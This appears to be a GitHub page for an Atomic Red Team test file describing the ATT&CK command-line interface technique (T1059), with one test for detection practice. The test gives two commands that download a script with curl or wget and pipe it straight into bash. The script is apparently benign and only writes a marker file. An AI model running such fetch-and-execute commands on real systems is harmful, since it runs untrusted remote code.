Skip to content

Latest commit

 

History

History
34 lines (17 loc) · 1.74 KB

T1059.md

File metadata and controls

34 lines (17 loc) · 1.74 KB

T1059 - Command-Line Interface

Command-line interfaces provide a way of interacting with computer systems and is a common feature across many types of operating system platforms. (Citation: Wikipedia Command-Line Interface) One example command-line interface on Windows systems is [cmd](https://attack.mitre.org/software/S0106), which can be used to perform a number of tasks including execution of other software. Command-line interfaces can be interacted with locally or remotely via a remote desktop application, reverse shell session, etc. Commands that are executed run with the current permission level of the command-line interface process unless the command includes process invocation that changes permissions context for that execution (e.g. [Scheduled Task](https://attack.mitre.org/techniques/T1053)).

Adversaries may use command-line interfaces to interact with systems and execute other software during the course of an operation.

Atomic Tests


Atomic Test #1 - Command-Line Interface

Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server.

This will download the specified payload and set a marker file in /tmp/art-fish.txt.

Supported Platforms: macOS, Linux

Attack Commands: Run with sh!

bash -c "curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059/echo-art-fish.sh | bash"
bash -c "wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Atomics/T1059/echo-art-fish.sh | bash"